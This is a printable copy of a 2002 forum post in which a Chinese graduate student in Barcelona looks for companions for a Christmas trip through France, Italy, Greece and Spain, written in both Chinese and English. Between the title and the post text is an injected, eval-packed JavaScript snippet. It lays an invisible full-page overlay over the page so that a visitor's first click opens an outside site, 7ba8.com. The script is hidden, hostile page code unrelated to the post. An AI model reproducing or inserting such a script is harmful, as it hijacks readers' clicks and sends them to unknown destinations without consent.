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标题: !!!一同畅游欧洲 [打印本页]

作者: upf    时间: 2002-11-15 03:06
标题: !!!一同畅游欧洲
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>一同畅游欧洲!
圣诞节和新年即将来临!远在异国他乡朋友打算 如何欢度这些节日?本人是一位研究生,目前在巴塞罗拿留学。学习实在是太辛苦,No weekends, no holidays! No fun! Only studing... no ending !  希望约一些朋友一同畅游欧洲。偶目前的主要目的地是法国,意大利,希腊以及西班牙。当然,这仅是偶目前的初步打算。目的地可以随时变更,如果有更好的建议!
愿意的朋友, 可以发电子邮件给偶:[email protected]
'>[email protected]

Traveling in Europe togather in this coming Chrismas!
Hi all,
The Chrismas holidays draws near, how to celebrate the holidays?
I am a graduate student (male) studying in Barcelona.The coursework here is very tough  No weekends, no holidays! No fun! Only studing... no ending ! I really want to have a break for myself when the holidays is at  hand.
For me, traveling the beatiful Europe is also a major reason attracting me to come here to study. I want to find some friends who are available at that time  to travel the great continent togather. I like to travel very much and also want to make friends meanwhile.
My main destinations will be France, Italy, Greece an Spain (the travling time lasts about two week). Of course, anyone has other good idea, I also like to share! We can make a final decision where should we go.

You can contact me via the following:[email protected]
'>[email protected]

I am look foward to hearing from you soon.
A chinese student in Spain

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